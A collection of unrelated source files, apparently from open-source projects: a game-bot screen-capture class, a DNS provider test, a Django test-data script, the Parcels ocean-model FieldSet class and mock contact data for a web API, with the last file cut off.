Logger.error(f"The max score that could be found was: ({debug_max_val*100:.1f}% confidence)")
raise RuntimeError("Could not determine window offset. Please make sure you have the D2R window " +
f"focused and that you are on the hero selection screen when pressing {self._config.general['resume_key']}")
def convert_monitor_to_screen(self, screen_coord: Tuple[float, float]) -> Tuple[float, float]:
return (screen_coord[0] - self._monitor_roi["left"], screen_coord[1] - self._monitor_roi["top"])
def convert_screen_to_monitor(self, screen_coord: Tuple[float, float]) -> Tuple[float, float]:
x = screen_coord[0] + self._monitor_roi["left"]
y = screen_coord[1] + self._monitor_roi["top"]
return (np.clip(x, *self._monitor_x_range), np.clip(y, *self._monitor_y_range))
def convert_abs_to_screen(self, abs_coord: Tuple[float, float]) -> Tuple[float, float]:
# abs has it's center on char which is the center of the screen
return ((self._monitor_roi["width"] // 2) + abs_coord[0], (self._monitor_roi["height"] // 2) + abs_coord[1])
def convert_screen_to_abs(self, screen_coord: Tuple[float, float]) -> Tuple[float, float]:
return (screen_coord[0] - (self._monitor_roi["width"] // 2), screen_coord[1] - (self._monitor_roi["height"] // 2))
def convert_abs_to_monitor(self, abs_coord: Tuple[float, float]) -> Tuple[float, float]:
screen_coord = self.convert_abs_to_screen(abs_coord)
monitor_coord = self.convert_screen_to_monitor(screen_coord)
return monitor_coord
def grab(self) -> np.ndarray:
img = np.array(self._sct.grab(self._monitor_roi))
return img[:, :, :3]
if __name__ == "__main__":
from config import Config
config = Config()
screen = Screen(config.general["monitor"])
while 1:
start = time.time()
test_img = screen.grab().copy()
# print(time.time() - start)
show_roi = True
show_pt = True
if show_roi:
for roi_key in config.ui_roi:
x, y, w, h = config.ui_roi[roi_key]
# t = screen.convert_screen_to_monitor((0, 0))
# p1 = screen.convert_screen_to_monitor((x, y))
# p2 = screen.convert_screen_to_monitor((x+w, y+h))
p1 = (x, y)
p2 = (x+w, y+h)
cv2.rectangle(test_img, p1, p2, (0, 255, 0), 2)
cv2.putText(test_img, roi_key, (p1[0], p1[1]+20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1, cv2.LINE_AA)
if show_pt:
pass
cv2.imshow("test", test_img)
cv2.waitKey(1)
|
# Test for one implementation of the interface
from lexicon.providers.glesys import Provider
from integration_tests import IntegrationTests
from unittest import TestCase
import pytest
# Hook into testing framework by inheriting unittest.TestCase and reuse
# the tests which *each and every* implementation of the interface must
# pass, by inheritance from define_tests.TheTests
class GlesysProviderTests(TestCase, IntegrationTests):
Provider = Provider
provider_name = 'glesys'
domain = "capsulecd.com"
def _filter_headers(self):
return ['Authorization']
# TODO: this should be enabled
@pytest.mark.skip(reason="regenerating auth keys required")
def test_Provider_when_calling_update_record_should_modify_record_name_specified(self):
return
@pytest.fixture(autouse=True)
def skip_suite(self, request):
if request.node.get_marker('ext_suite_1'):
pytest.skip('Skipping extended suite') |
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = '1.0 Beta'
import paddle
from . import config
from . import parameter
from . import geometry
from . import bc
from . import ic
from . import pde
from . import network
from . import algorithm
from . import loss
from . import optimizer
from . import solver
from . import visu
from . import data
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from shop.conf import app_settings
from shop.models.customer import CustomerModel
def customer(request):
"""
Add the customer to the RequestContext
"""
msg = "The request object does not contain a customer. Edit your MIDDLEWARE_CLASSES setting to insert 'shop.middlerware.CustomerMiddleware'."
assert hasattr(request, 'customer'), msg
context = {
'customer': request.customer,
'site_header': app_settings.APP_LABEL.capitalize(),
}
if request.user.is_staff:
try:
context.update(customer=CustomerModel.objects.get(pk=request.session['emulate_user_id']))
except (CustomerModel.DoesNotExist, KeyError, AttributeError):
pass
return context
def ng_model_options(request):
"""
Add ng-model-options to the context, since these settings must be configurable
"""
return {
'EDITCART_NG_MODEL_OPTIONS': app_settings.EDITCART_NG_MODEL_OPTIONS,
'ADD2CART_NG_MODEL_OPTIONS': app_settings.ADD2CART_NG_MODEL_OPTIONS,
}
|
module.exports = {
devServer: {
proxy: {
'/api': {
target: 'http://127.0.0.1:3000', //对应自己的接口
changeOrigin: true, //是否跨域
ws: true,
pathRewrite: {
'^/api': ''
}
}
}
}
} |
from django.contrib.auth.models import User
from EkList.models import Auction
import datetime
import pytz
def populate():
"""
This fills the EkList Django database with 99 users, and 1 auction for each of them.
It then adds a single bid for 1/7th of those auctions, from 6 different users (id 1-6)
It also creates an admin account.
Please not that this script has to be run from the Django python shell, so Django knows which app settings to use.
Test data was dumped to fixture with manage.py dumpdata --natural-foreign --natural-primary --indent=4 > testdata.json
"""
for number in range(1, 100):
user = User.objects.create_user(username=str(number), password=str(number))
user.save()
auction = Auction()
auction.id = number
auction.title = u"User {} item".format(user.username)
auction.description = auction.title
auction.minimum_bid = 5.0
auction.expires = datetime.datetime(year=2016, month=12, day=24, hour=13, minute=00, tzinfo=pytz.utc)
auction.creator_username = user.username
auction.created = datetime.datetime.now()
auction.save()
for number in range(1, 99, 7):
print number
auction = Auction.get_by_id(number)
auction.current_bid = 10.0
auction.current_bid_timestamp = datetime.datetime.now()
auction.current_bidder_username = User.objects.get(username=str((number % 6) + 1)).username
auction.save()
superuser = User.objects.create_superuser(username="admin", email="[email protected]", password="secureadminpassword")
superuser.save()
if __name__ == "__main__":
populate()
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
General functional-style helpers for disttrial.
"""
from functools import partial, wraps
from typing import Awaitable, Callable, Optional, TypeVar
from twisted.internet.defer import Deferred, succeed
_A = TypeVar("_A")
_B = TypeVar("_B")
_C = TypeVar("_C")
def fromOptional(default: _A, optional: Optional[_A]) -> _A:
"""
Get a definite value from an optional value.
@param default: The value to return if the optional value is missing.
@param optional: The optional value to return if it exists.
"""
if optional is None:
return default
return optional
async def sequence(a: Awaitable[_A], b: Awaitable[_B]) -> _B:
"""
Wait for one action to complete and then another.
If either action fails, failure is propagated. If the first action fails,
the second action is not waited on.
"""
await a
return await b
def flip(f: Callable[[_A, _B], _C]) -> Callable[[_B, _A], _C]:
"""
Create a function like another but with the order of the first two
arguments flipped.
"""
@wraps(f)
def g(b, a):
return f(a, b)
return g
def compose(fx: Callable[[_B], _C], fy: Callable[[_A], _B]) -> Callable[[_A], _C]:
"""
Create a function that calls one function with an argument and then
another function with the result of the first function.
"""
@wraps(fx)
@wraps(fy)
def g(a):
return fx(fy(a))
return g
# Discard the result of an awaitable and substitute None in its place.
#
# Ignore the `Cannot infer type argument 1 of "compose"`
# https://github.com/python/mypy/issues/6220
discardResult: Callable[[Awaitable[_A]], Deferred[None]] = compose( # type: ignore[misc]
Deferred.fromCoroutine,
partial(flip(sequence), succeed(None)),
)
async def iterateWhile(
predicate: Callable[[_A], bool],
action: Callable[[], Awaitable[_A]],
) -> _A:
"""
Call a function repeatedly until its result fails to satisfy a predicate.
@param predicate: The check to apply.
@param action: The function to call.
@return: The result of C{action} which did not satisfy C{predicate}.
"""
while True:
result = await action()
if not predicate(result):
return result
def countingCalls(f: Callable[[int], _A]) -> Callable[[], _A]:
"""
Wrap a function with another that automatically passes an integer counter
of the number of calls that have gone through the wrapper.
"""
counter = 0
def g():
nonlocal counter
try:
result = f(counter)
finally:
counter += 1
return result
return g
|
from parcels.field import Field, VectorField, SummedField, SummedVectorField
from parcels.gridset import GridSet
from parcels.grid import RectilinearZGrid
from parcels.tools.loggers import logger
from parcels.tools.converters import TimeConverter
import numpy as np
from os import path
from glob import glob
from copy import deepcopy
__all__ = ['FieldSet']
class FieldSet(object):
"""FieldSet class that holds hydrodynamic data needed to execute particles
:param U: :class:`parcels.field.Field` object for zonal velocity component
:param V: :class:`parcels.field.Field` object for meridional velocity component
:param fields: Dictionary of additional :class:`parcels.field.Field` objects
"""
def __init__(self, U, V, fields=None):
self.gridset = GridSet()
if U:
self.add_field(U, 'U')
self.time_origin = self.U.grid.time_origin if isinstance(self.U, Field) else self.U[0].grid.time_origin
if V:
self.add_field(V, 'V')
# Add additional fields as attributes
if fields:
for name, field in fields.items():
self.add_field(field, name)
self.compute_on_defer = None
@classmethod
def from_data(cls, data, dimensions, transpose=False, mesh='spherical',
allow_time_extrapolation=None, time_periodic=False, **kwargs):
"""Initialise FieldSet object from raw data
:param data: Dictionary mapping field names to numpy arrays.
Note that at least a 'U' and 'V' numpy array need to be given
1. If data shape is [xdim, ydim], [xdim, ydim, zdim], [xdim, ydim, tdim] or [xdim, ydim, zdim, tdim],
whichever is relevant for the dataset, use the flag transpose=True
2. If data shape is [ydim, xdim], [zdim, ydim, xdim], [tdim, ydim, xdim] or [tdim, zdim, ydim, xdim],
use the flag transpose=False (default value)
3. If data has any other shape, you first need to reorder it
:param dimensions: Dictionary mapping field dimensions (lon,
lat, depth, time) to numpy arrays.
Note that dimensions can also be a dictionary of dictionaries if
dimension names are different for each variable
(e.g. dimensions['U'], dimensions['V'], etc).
:param transpose: Boolean whether to transpose data on read-in
:param mesh: String indicating the type of mesh coordinates and
units used during velocity interpolation:
1. spherical (default): Lat and lon in degree, with a
correction for zonal velocity U near the poles.
2. flat: No conversion, lat/lon are assumed to be in m.
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
"""
fields = {}
for name, datafld in data.items():
# Use dimensions[name] if dimensions is a dict of dicts
dims = dimensions[name] if name in dimensions else dimensions
if allow_time_extrapolation is None:
allow_time_extrapolation = False if 'time' in dims else True
lon = dims['lon']
lat = dims['lat']
depth = np.zeros(1, dtype=np.float32) if 'depth' not in dims else dims['depth']
time = np.zeros(1, dtype=np.float64) if 'time' not in dims else dims['time']
grid = RectilinearZGrid(lon, lat, depth, time, time_origin=TimeConverter(), mesh=mesh)
fields[name] = Field(name, datafld, grid=grid, transpose=transpose,
allow_time_extrapolation=allow_time_extrapolation, time_periodic=time_periodic, **kwargs)
u = fields.pop('U', None)
v = fields.pop('V', None)
return cls(u, v, fields=fields)
def add_field(self, field, name=None):
"""Add a :class:`parcels.field.Field` object to the FieldSet
:param field: :class:`parcels.field.Field` object to be added
:param name: Name of the :class:`parcels.field.Field` object to be added
"""
name = field.name if name is None else name
if isinstance(field, SummedField):
setattr(self, name, field)
for fld in field:
self.gridset.add_grid(fld)
fld.fieldset = self
elif isinstance(field, list):
raise NotImplementedError('FieldLists have been replaced by SummedFields. Use the + operator instead of []')
else:
setattr(self, name, field)
self.gridset.add_grid(field)
field.fieldset = self
def add_vector_field(self, vfield):
"""Add a :class:`parcels.field.VectorField` object to the FieldSet
:param vfield: :class:`parcels.field.VectorField` object to be added
"""
setattr(self, vfield.name, vfield)
vfield.fieldset = self
def check_complete(self):
assert self.U, 'FieldSet does not have a Field named "U"'
assert self.V, 'FieldSet does not have a Field named "V"'
for attr, value in vars(self).items():
if type(value) is Field:
assert value.name == attr, 'Field %s.name (%s) is not consistent' % (value.name, attr)
for g in self.gridset.grids:
g.check_zonal_periodic()
if len(g.time) == 1:
continue
assert isinstance(g.time_origin, type(self.time_origin)), 'time origins of different grids must be have the same type'
g.time = g.time + self.time_origin.reltime(g.time_origin)
if g.defer_load:
g.time_full = g.time_full + self.time_origin.reltime(g.time_origin)
g.time_origin = self.time_origin
if not hasattr(self, 'UV'):
if isinstance(self.U, SummedField):
self.add_vector_field(SummedVectorField('UV', self.U, self.V))
else:
self.add_vector_field(VectorField('UV', self.U, self.V))
if not hasattr(self, 'UVW') and hasattr(self, 'W'):
if isinstance(self.U, SummedField):
self.add_vector_field(SummedVectorField('UVW', self.U, self.V, self.W))
else:
self.add_vector_field(VectorField('UVW', self.U, self.V, self.W))
@classmethod
def parse_wildcards(cls, paths, filenames, var):
if not isinstance(paths, list):
paths = sorted(glob(str(paths)))
if len(paths) == 0:
notfound_paths = filenames[var] if type(filenames) is dict and var in filenames else filenames
raise IOError("FieldSet files not found: %s" % str(notfound_paths))
for fp in paths:
if not path.exists(fp):
raise IOError("FieldSet file not found: %s" % str(fp))
return paths
@classmethod
def from_netcdf(cls, filenames, variables, dimensions, indices=None,
mesh='spherical', allow_time_extrapolation=None, time_periodic=False, full_load=False, **kwargs):
"""Initialises FieldSet object from NetCDF files
:param filenames: Dictionary mapping variables to file(s). The
filepath may contain wildcards to indicate multiple files,
or be a list of file.
filenames can be a list [files], a dictionary {var:[files]},
a dictionary {dim:[files]} (if lon, lat, depth and/or data not stored in same files as data),
or a dictionary of dictionaries {var:{dim:[files]}}.
time values are in filenames[data]
:param variables: Dictionary mapping variables to variable
names in the netCDF file(s).
:param dimensions: Dictionary mapping data dimensions (lon,
lat, depth, time, data) to dimensions in the netCF file(s).
Note that dimensions can also be a dictionary of dictionaries if
dimension names are different for each variable
(e.g. dimensions['U'], dimensions['V'], etc).
:param indices: Optional dictionary of indices for each dimension
to read from file(s), to allow for reading of subset of data.
Default is to read the full extent of each dimension.
:param mesh: String indicating the type of mesh coordinates and
units used during velocity interpolation:
1. spherical (default): Lat and lon in degree, with a
correction for zonal velocity U near the poles.
2. flat: No conversion, lat/lon are assumed to be in m.
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
:param full_load: boolean whether to fully load the data or only pre-load them. (default: False)
It is advised not to fully load the data, since in that case Parcels deals with
a better memory management during particle set execution.
full_load is however sometimes necessary for plotting the fields.
:param netcdf_engine: engine to use for netcdf reading in xarray. Default is 'netcdf',
but in cases where this doesn't work, setting netcdf_engine='scipy' could help
"""
fields = {}
for var, name in variables.items():
# Resolve all matching paths for the current variable
paths = filenames[var] if type(filenames) is dict and var in filenames else filenames
if type(paths) is not dict:
paths = cls.parse_wildcards(paths, filenames, var)
else:
for dim, p in paths.items():
paths[dim] = cls.parse_wildcards(p, filenames, var)
# Use dimensions[var] and indices[var] if either of them is a dict of dicts
dims = dimensions[var] if var in dimensions else dimensions
dims['data'] = name
inds = indices[var] if (indices and var in indices) else indices
grid = None
# check if grid has already been processed (i.e. if other fields have same filenames, dimensions and indices)
for procvar, _ in fields.items():
procdims = dimensions[procvar] if procvar in dimensions else dimensions
procinds = indices[procvar] if (indices and procvar in indices) else indices
if procdims == dims and procinds == inds:
sameGrid = False
if (type(filenames) is not dict or filenames[procvar] == filenames[var]):
sameGrid = True
elif type(filenames[procvar]) == dict:
sameGrid = True
for dim in ['lon', 'lat', 'depth']:
if dim in dimensions:
sameGrid *= filenames[procvar][dim] == filenames[var][dim]
if sameGrid:
grid = fields[procvar].grid
kwargs['dataFiles'] = fields[procvar].dataFiles
break
fields[var] = Field.from_netcdf(paths, var, dims, inds, grid=grid, mesh=mesh,
allow_time_extrapolation=allow_time_extrapolation,
time_periodic=time_periodic, full_load=full_load, **kwargs)
u = fields.pop('U', None)
v = fields.pop('V', None)
return cls(u, v, fields=fields)
@classmethod
def from_nemo(cls, filenames, variables, dimensions, indices=None, mesh='spherical',
allow_time_extrapolation=None, time_periodic=False,
tracer_interp_method='linear', **kwargs):
"""Initialises FieldSet object from NetCDF files of Curvilinear NEMO fields.
:param filenames: Dictionary mapping variables to file(s). The
filepath may contain wildcards to indicate multiple files,
or be a list of file.
filenames can be a list [files], a dictionary {var:[files]},
a dictionary {dim:[files]} (if lon, lat, depth and/or data not stored in same files as data),
or a dictionary of dictionaries {var:{dim:[files]}}
time values are in filenames[data]
:param variables: Dictionary mapping variables to variable
names in the netCDF file(s).
:param dimensions: Dictionary mapping data dimensions (lon,
lat, depth, time, data) to dimensions in the netCF file(s).
Note that dimensions can also be a dictionary of dictionaries if
dimension names are different for each variable.
Watch out: NEMO is discretised on a C-grid:
U and V velocities are not located on the same nodes (see https://www.nemo-ocean.eu/doc/node19.html ).
__V1__
| |
U0 U1
|__V0__|
To interpolate U, V velocities on the C-grid, Parcels needs to read the f-nodes,
which are located on the corners of the cells.
(for indexing details: https://www.nemo-ocean.eu/doc/img360.png )
:param indices: Optional dictionary of indices for each dimension
to read from file(s), to allow for reading of subset of data.
Default is to read the full extent of each dimension.
:param mesh: String indicating the type of mesh coordinates and
units used during velocity interpolation:
1. spherical (default): Lat and lon in degree, with a
correction for zonal velocity U near the poles.
2. flat: No conversion, lat/lon are assumed to be in m.
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
:param tracer_interp_method: Method for interpolation of tracer fields. Either 'linear' or 'nearest'
Note that in the case of from_nemo(), the velocity fields are default to 'cgrid_linear'
"""
if 'U' in dimensions and 'V' in dimensions and dimensions['U'] != dimensions['V']:
raise RuntimeError("On a c-grid discretisation like NEMO, U and V should have the same dimensions")
interp_method = {}
for v in variables:
if v in ['U', 'V', 'W']:
interp_method[v] = 'cgrid_linear'
else:
interp_method[v] = tracer_interp_method
return cls.from_netcdf(filenames, variables, dimensions, mesh=mesh, indices=indices, time_periodic=time_periodic,
allow_time_extrapolation=allow_time_extrapolation, interp_method=interp_method, **kwargs)
@classmethod
def from_parcels(cls, basename, uvar='vozocrtx', vvar='vomecrty', indices=None, extra_fields=None,
allow_time_extrapolation=None, time_periodic=False, full_load=False, **kwargs):
"""Initialises FieldSet data from NetCDF files using the Parcels FieldSet.write() conventions.
:param basename: Base name of the file(s); may contain
wildcards to indicate multiple files.
:param indices: Optional dictionary of indices for each dimension
to read from file(s), to allow for reading of subset of data.
Default is to read the full extent of each dimension.
:param extra_fields: Extra fields to read beyond U and V
:param allow_time_extrapolation: boolean whether to allow for extrapolation
(i.e. beyond the last available time snapshot)
Default is False if dimensions includes time, else True
:param time_periodic: boolean whether to loop periodically over the time component of the FieldSet
This flag overrides the allow_time_interpolation and sets it to False
:param full_load: boolean whether to fully load the data or only pre-load them. (default: False)
It is advised not to fully load the data, since in that case Parcels deals with
a better memory management during particle set execution.
full_load is however sometimes necessary for plotting the fields.
"""
if extra_fields is None:
extra_fields = {}
dimensions = {}
default_dims = {'lon': 'nav_lon', 'lat': 'nav_lat',
'depth': 'depth', 'time': 'time_counter'}
extra_fields.update({'U': uvar, 'V': vvar})
for vars in extra_fields:
dimensions[vars] = deepcopy(default_dims)
dimensions[vars]['depth'] = 'depth%s' % vars.lower()
filenames = dict([(v, str("%s%s.nc" % (basename, v)))
for v in extra_fields.keys()])
return cls.from_netcdf(filenames, indices=indices, variables=extra_fields,
dimensions=dimensions, allow_time_extrapolation=allow_time_extrapolation,
time_periodic=time_periodic, full_load=full_load, **kwargs)
@property
def fields(self):
"""Returns a list of all the :class:`parcels.field.Field` objects
associated with this FieldSet"""
fields = []
for v in self.__dict__.values():
if isinstance(v, Field):
fields.append(v)
elif isinstance(v, SummedField):
for v2 in v:
if v2 not in fields:
fields.append(v2)
return fields
def add_constant(self, name, value):
"""Add a constant to the FieldSet. Note that all constants are
stored as 32-bit floats. While constants can be updated during
execution in SciPy mode, they can not be updated in JIT mode.
:param name: Name of the constant
:param value: Value of the constant (stored as 32-bit float)
"""
setattr(self, name, value)
def add_periodic_halo(self, zonal=False, meridional=False, halosize=5):
"""Add a 'halo' to all :class:`parcels.field.Field` objects in a FieldSet,
through extending the Field (and lon/lat) by copying a small portion
of the field on one side of the domain to the other.
:param zonal: Create a halo in zonal direction (boolean)
:param meridional: Create a halo in meridional direction (boolean)
:param halosize: size of the halo (in grid points). Default is 5 grid points
"""
for grid in self.gridset.grids:
grid.add_periodic_halo(zonal, meridional, halosize)
for attr, value in iter(self.__dict__.items()):
if isinstance(value, Field):
value.add_periodic_halo(zonal, meridional, halosize)
def eval(self, x, y):
"""Evaluate the zonal and meridional velocities (u,v) at a point (x,y)
:param x: zonal point to evaluate
:param y: meridional point to evaluate
:return u, v: zonal and meridional velocities at point"""
u = self.U.eval(x, y)
v = self.V.eval(x, y)
return u, v
def write(self, filename):
"""Write FieldSet to NetCDF file using NEMO convention
:param filename: Basename of the output fileset"""
logger.info("Generating NEMO FieldSet output with basename: %s" % filename)
if hasattr(self, 'U'):
self.U.write(filename, varname='vozocrtx')
if hasattr(self, 'V'):
self.V.write(filename, varname='vomecrty')
for v in self.fields:
if (v.name is not 'U') and (v.name is not 'V'):
v.write(filename)
def advancetime(self, fieldset_new):
"""Replace oldest time on FieldSet with new FieldSet
:param fieldset_new: FieldSet snapshot with which the oldest time has to be replaced"""
logger.warning_once("Fieldset.advancetime() is deprecated.\n \
Parcels deals automatically with loading only 3 time steps simustaneously\
such that the total allocated memory remains limited.")
advance = 0
for gnew in fieldset_new.gridset.grids:
gnew.advanced = False
for fnew in fieldset_new.fields:
if isinstance(fnew, VectorField):
continue
f = getattr(self, fnew.name)
gnew = fnew.grid
if not gnew.advanced:
g = f.grid
advance2 = g.advancetime(gnew)
if advance2*advance < 0:
raise RuntimeError("Some Fields of the Fieldset are advanced forward and other backward")
advance = advance2
gnew.advanced = True
f.advancetime(fnew, advance == 1)
def computeTimeChunk(self, time, dt):
signdt = np.sign(dt)
nextTime = np.infty if dt > 0 else -np.infty
for g in self.gridset.grids:
g.update_status = 'not_updated'
for f in self.fields:
if isinstance(f, VectorField) or not f.grid.defer_load:
continue
if f.grid.update_status == 'not_updated':
nextTime_loc = f.grid.computeTimeChunk(f, time, signdt)
nextTime = min(nextTime, nextTime_loc) if signdt >= 0 else max(nextTime, nextTime_loc)
# load in new data
for f in self.fields:
if isinstance(f, VectorField) or not f.grid.defer_load or f.is_gradient or f.dataFiles is None:
continue
g = f.grid
if g.update_status == 'first_updated': # First load of data
data = np.empty((g.tdim, g.zdim, g.ydim-2*g.meridional_halo, g.xdim-2*g.zonal_halo), dtype=np.float32)
f.loaded_time_indices = range(3)
for tind in f.loaded_time_indices:
data = f.computeTimeChunk(data, tind)
f.data = f.reshape(data)
elif g.update_status == 'updated':
data = np.empty((g.tdim, g.zdim, g.ydim-2*g.meridional_halo, g.xdim-2*g.zonal_halo), dtype=np.float32)
if signdt >= 0:
f.data[:2, :] = f.data[1:, :]
f.loaded_time_indices = [2]
else:
f.data[1:, :] = f.data[:2, :]
f.loaded_time_indices = [0]
data = f.computeTimeChunk(data, f.loaded_time_indices[0])
f.data[f.loaded_time_indices[0], :] = f.reshape(data)[f.loaded_time_indices[0], :]
else:
f.loaded_time_indices = []
# do built-in computations on data
for tind in f.loaded_time_indices:
if f._scaling_factor:
f.data[tind, :] *= f._scaling_factor
f.data[tind, :] = np.where(np.isnan(f.data[tind, :]), 0, f.data[tind, :])
if f.vmin is not None:
f.data[tind, :] = np.where(f.data[tind, :] < f.vmin, 0, f.data[tind, :])
if f.vmax is not None:
f.data[tind, :] = np.where(f.data[tind, :] > f.vmax, 0, f.data[tind, :])
if f.gradientx is not None:
f.gradient(update=True, tindex=tind)
# do user-defined computations on fieldset data
if self.compute_on_defer:
self.compute_on_defer(self)
if abs(nextTime) == np.infty or np.isnan(nextTime): # Second happens when dt=0
return nextTime
else:
nSteps = int((nextTime - time) / dt)
if nSteps == 0:
return nextTime
else:
return time + nSteps * dt
|
'use strict';
exports.getContacts = function (req, res, next) {
//var getContacts = function(){
var data = [
{
"id": 10238,
"name": "Marc Barnes",
"email": "[email protected]",
"username": "MarcBarnes",
"contact": "(382) 122-5003"
},
{
"id": 10243,
"name": "Glen Curtis",
"email": "[email protected]",
"username": "GlenCurtis",
"contact": "(477) 981-4948"
},
{
"id": 10248,
"name": "Beverly Gonzalez",
"email": "[email protected]",
"username": "BeverlyGonzalez",
"contact": "(832) 255-5161"
},
{
"id": 10253,
"name": "Yvonne Chavez",
"email": "[email protected]",
"username": "YvonneChavez",
"contact": "(477) 446-3715"
},
{
"id": 10234,
"name": "Melinda Mitchelle",
"email": "[email protected]",
"username": "MelindaMitchelle",
"contact": "(813) 716-4996"
},
{
"id": 10239,
"name": "Shannon Bradley",
"email": "[email protected]",
"username": "ShannonBradley",
"contact": "(774) 291-9928"
},
{
"id": 10244,
"name": "Virgil Kim",
"email": "[email protected]",
"username": "VirgilKim",
"contact": "(219) 181-7898"
},
{
"id": 10249,
"name": "Letitia Robertson",
"email": "[email protected]",
"username": "Letitia Robertson",
"contact": "(647) 209-4589"
},
{
"id": 10237,
"name": "Claude King",
"email": "[email protected]",
"username": "ClaudeKing",
"contact": "(657) 988-8701"
},
{
"id": 10242,
"name": "Roland Craig",
"email": "[email protected]",
"username": "RolandCraig",
"contact": "(932) 935-9471"
},
{
"id": 10247,
"name": "Colleen Parker",
"email": "[email protected]",
"username": "ColleenParker",
"contact": "(857) 459-2792"
},
{
"id": 10252,
"name": "Leah Jensen",
"email": "[email protected]",
"username": "LeahJensen",
"contact": "(861) 275-4686"
},
{
"id": 10236,
"name": "Harold Martinez",
"email": "[email protected]",
"username": "HaroldMartinez",
"contact": "(836) 634-9133"
},
{
"id": 10241,
"name": "Keith Lowe",
"email": "[email protected]",
"username": "KeithLowe",
"contact": "(778) 787-3100"
},
{
"id": 10246,
"name": "Charles Walker",
"email": "[email protected]",
"username": "CharlesWalker",
"contact": "(486) 440-4716"
},
{
"id": 10251,
"name": "Lillie Curtis",
"email": "[email protected]",
"username": "LillieCurtis",
"contact": "(342) 510-2258"
},
{
"id": 10235,
"name": "Genesis Reynolds",
"email": "[email protected]",
"username": "GenesisReynolds",
"contact": "(339) 375-1858"
},
{
"id": 10240,
"name": "Oscar Palmer",
"email": "[email protected]",
"username": "OscarPalmer",
"contact": "(544) 270-9912"
}
];
// return data;
res.send({"result": data});
};
exports.getContactDetailsById = function (req, res, next) {
var data = [
{
"id": 10238,
"name": "Marc Barnes",
"email": "[email protected]",
"username": "MarcBarnes",
"leadSource": "Impiger",
"company": "Impiger",
"title": "Mr",
"gender": "male",
"age": "31",
"primaryPhone": "3214569877",
"secondaryPhone": "7894561236",
"extension": "574",
"fax": "78451236",
"website": "http://www.arthurmurraymemorial.com/",
"street": "9746 Katy Fwy",
"city": "Hacienda Heights",
"state": "Washington",
"country": "United States",
"zipCode": "600017",
"contact": "(382) 122-5003",
"basicInformation": "1",
"contactInformation": "1",
"addressInformation": "1",
"otherInformation": "1"
},
{
"id": 10243,
"name": "Glen Curtis",
"email": "[email protected]",
"username": "GlenCurtis",
"contact": "(477)-981-4948"
},
{
"id": 10248,
"name": "Beverly Gonzalez",
"email": "[email protected]",
"username": "BeverlyGonzalez",
"contact": "(832)-255-5161"
},
{
"id": 10253,
"name": "Yvonne Chavez",
"email": "[email protected]",
"username": "YvonneChavez",
"contact": "(477)-446-3715"
},
{
"id": 10234,
"name": "Melinda Mitchelle",
"email": "[email protected]",
"username": "MelindaMitchelle",
"contact": "(813)-716-4996"
},
{
"id": 10239,
"name": "Shannon Bradley",
"email": "[email protected]",
"username": "ShannonBradley",
"contact": "(774)-291-9928"
},
{
"id": 10244,
"name": "Virgil Kim",
"email": "[email protected]",
"username": "VirgilKim",
"contact": "(219)-181-7898"
},
{
"id": 10249,
"name": "Letitia Robertson",
"email": "[email protected]",
"username": "Letitia Robertson",
"contact": "(647)-209-4589"
},
{
"id": 10237,
"name": "Claude King",
"email": "[email protected]",
"username": "ClaudeKing",
"contact": "(657)-988-8701"
},
{
"id": 10242,
"name": "Roland Craig",
"email": "[email protected]",
"username": "RolandCraig",
"contact": "(932)-935-9471"
},
{
"id": 10247,
"name": "Colleen Parker",
"email": "[email protected]",
"username": "ColleenParker",
"contact": "(857)-459-2792"
},
{
"id": 10252,
"name": "Leah Jensen",
"email": "[email protected]",
"username": "LeahJensen",
"contact": "(861)-275-4686"
},
{
"id": 10236,
"name": "Harold Martinez",
"email": "[email protected]",
"username": "HaroldMartinez",
"contact": "(836)-634-9133"
},
{
"id": 10241,
"name": "Keith Lowe",
"email": "[email protected]",
"username": "KeithLowe",
"contact": "(778)-787-3100"
},
{
"id": 10246,
"name": "Charles Walker",
"email": "[email protected]",
"username": "CharlesWalker",
"contact": "(486)-440-4716"
},
{
"id": 10251,
"name": "Lillie Curtis",
"email": "[email protected]",
"username": "LillieCurtis",
"contact": "(342)-510-2258"
},
{
"id": 10235,
"name": "Genesis Reynolds",
"email": "[email protected]",
"username": "GenesisReynolds",
"contact": "(339)-375-1858"
},
{
"id": 10240,
"name": "Oscar Palmer",
"email": "[email protected]",
"username": "OscarPalmer",
"contact": "(544)-270-9912"
}
];
var result = getDetails(data, id);
// return result;
res.send({"result": result});
};
exports.getContactsDetails = function (req, res, next) {
var data = [
{
"leadSource": "Impiger",
"company": "Glencove",
"title": "Mr",
"name": "Jenchun Wu",
"gender": "male",
"age": "35",
"primaryPhone": "17134681628",
"secondaryPhone": "17134681627",
"extension": "123",
"email": "[email protected]",
"fax": "123123",
"website": "http://www.arthurmurraymemorial.com/",
"street": "9746 Katy Fwy",
"city": "Hacienda Heights",
"state": "Ca",
"country": "US",
"zipCode": "77055",
"listed": "06/16/15",
"dom": "183",
"areaName": "Hacienda Heights",
"propertyType": "Single Family Residence",
"office": "IRN Realty",
"listAgent": "Lazar Chang",
"offMarket": "12/15/15",
"listPrice": "$932,558",
"status": "Expired",
"mlslistingID": "TR15131807",
"prevStatusDate": "06/18/15",
"prevStatus": "Active",
"mlsid": "8241-002-042"
// "basicInformation": "1",
// "contactInformation": "1",
// "addressInformation": "1",
// "otherInformation": "1"
}
];
// var result = getDetails(data[i], id);
